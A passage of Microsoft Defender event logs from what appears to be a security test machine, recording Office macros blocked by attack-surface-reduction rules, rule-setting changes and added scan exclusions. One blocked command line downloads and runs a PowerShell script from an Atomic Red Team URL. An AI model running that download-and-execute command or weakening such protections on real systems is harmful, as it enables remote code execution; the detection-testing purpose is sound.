allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:17:08.694Z User: researchvmhaa\research Path: C:\Windows\System32\calc.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\calc.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 05:16:52 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2338 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:16:52.179Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 04:44:11 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2319 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T16:44:11.592Z User: researchvmhaa\research Path: C:\Windows\System32\rundll32.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls" Involved File: C:\Users\research\Desktop\macs\mac5.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 04:43:58 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2318 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T16:43:58.799Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\System32\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 04:43:58 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2317 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T16:43:58.666Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 04:38:21 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2316 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\research\Desktop = 0x0 11/17/2023 04:37:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2311 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\research\Desktop\macs = 0x0 11/17/2023 04:35:02 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2297 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T16:35:02.260Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\mac1.xls" Involved File: C:\Users\research\Desktop\mac1.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2291 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2290 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2289 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2288 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2287 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2286 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2285 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2284 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2283 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2282 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2281 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2280 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2279 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2278 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2277 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2276 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 11/17/2023 04:29:02 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2273 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 26190899-1602-49E8-8B27-EB1D0A1CE869 Detection time: 2023-11-17T16:29:02.666Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Target Commandline: "C:\Windows\System32\cmd.exe" Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 04:27:34 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2272 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T16:27:34.524Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd.exe" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 04:05:15 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2083 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-17T16:05:15.532Z User: NT AUTHORITY\SYSTEM Path: C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: "C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe" Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 03:59:51 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2082 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T15:59:51.981Z User: researchvmhaa\research Path: C:\Windows\System32\calc.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\calc.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 03:59:16 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2081 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T15:59:16.861Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 09:28:52 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1903 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1867 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1866 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1865 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1864 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1863 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1862 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1861 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1860 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 